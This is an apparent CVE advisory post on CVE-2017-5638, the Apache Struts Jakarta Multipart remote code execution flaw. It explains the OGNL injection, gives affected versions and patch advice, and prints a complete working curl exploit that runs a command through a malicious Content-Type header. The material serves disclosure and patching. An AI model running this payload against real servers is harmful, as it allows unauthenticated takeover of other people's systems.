Listen to this Post
How the mentioned CVE works:
The CVE-2017-5638 vulnerability exists in the Jakarta Multipart parser of Apache Struts. The flaw is triggered when a malicious `Content-Type` header is sent in an HTTP request to a Struts-based application. If the header value contains an error message, the parser incorrectly attempts to process it using the Object-Graph Navigation Language (OGNL). This OGNL evaluation is performed without any restrictions, allowing an attacker to inject and execute arbitrary OGNL expressions. These expressions are interpreted by the server, leading to the execution of operating system commands with the same privileges as the Struts application server. This provides a direct vector for complete system compromise without requiring authentication.
DailyCVE Form:
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’whoami’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-endpoint`
How Exploit:
Craft malicious Content-Type header.
Send HTTP request.
OGNL expression execution.
Arbitrary command injection.
Protection from this CVE:
Upgrade Struts version.
Apply official patch.
Use input validation filters.
Impact:
Remote Code Execution.
Full System Compromise.
Unauthenticated Attack Vector.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

